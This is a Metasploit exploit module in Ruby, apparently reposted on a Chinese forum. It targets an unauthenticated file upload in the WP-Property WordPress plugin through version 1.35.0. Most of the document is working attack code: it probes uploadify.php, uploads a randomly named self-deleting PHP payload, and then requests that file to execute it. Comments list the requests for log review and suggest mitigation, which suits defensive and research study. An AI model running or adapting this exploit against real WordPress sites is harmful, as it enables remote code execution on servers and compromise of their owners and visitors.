WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

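require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below).
#
# HTTP requests this module issues, listed for log review and detection work:
#   * GET  <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#     (sent by #check)
#   * POST to the same path as multipart/form-data with a "Filedata" part
#     (a randomly named .php file) and a "folder" part (sent by #exploit)
#   * GET  of the path returned in the body of the upload response
#     (sent by #exploit)
#
# Mitigation, as far as the description supports it: the flaw is that
# uploadify.php accepts uploads without authentication, so the script should
# not be reachable by anonymous clients and the plugin should be updated.
# NOTE(review): this listing names no fixed version; confirm against the
# references before stating one.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The forum's emoticon filter had mangled this line ("::P" was turned into a
  # smiley); the mixin matches the 'msf/core/exploit/php_exe' require above.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides passed in by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the upload script with a single GET request.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response or the
  #   status is not 200, Appears otherwise
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uploadify_dir}uploadify.php"
    })

    # No answer, or any status other than 200, says nothing either way.
    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200

    # NOTE(review): a 200 only shows that uploadify.php is reachable. The
    # plugin version is never read, so a patched or access-controlled copy
    # that still answers 200 is reported as Appears as well.
    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named PHP file through uploadify.php and then requests
  # the location the server reports for it.
  #
  # Fails with UnexpectedReply when the upload gets no response, a status
  # other than 200, or a body that does not contain the generated file name.
  def exploit
    base = uploadify_dir
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): :unlink_self presumably asks the PhpEXE mixin for a stub
    # that deletes itself after running; confirm in the mixin. If so, the file
    # may not remain on disk, and web server logs are the evidence to keep.
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part(base, nil, nil, "form-data; name=\"folder\"")
    # Removes the CRLF that precedes a "--_Part_" boundary at the start of a
    # line in the serialized message (first match only).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The generated name is matched literally rather than as a regex, so the
    # "." in ".php" cannot match an arbitrary character.
    if res.nil? || res.code != 200 || !res.body.to_s.include?(@payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The path requested next is taken verbatim from the upload response body.
    upload_uri = res.body
    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Builds the URI of the plugin's uploadify directory below TARGETURI.
  # Works on a fresh string, so the value returned by target_uri.path is not
  # modified in place as the original `uri << '/'` did.
  #
  # @return [String] directory URI ending in "/"
  def uploadify_dir
    base = target_uri.path
    base += '/' unless base.end_with?('/')
    "#{base}wp-content/plugins/wp-property/third-party/uploadify/"
  end
end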
不要问我这写的是什么 怎么利用 我是说msf.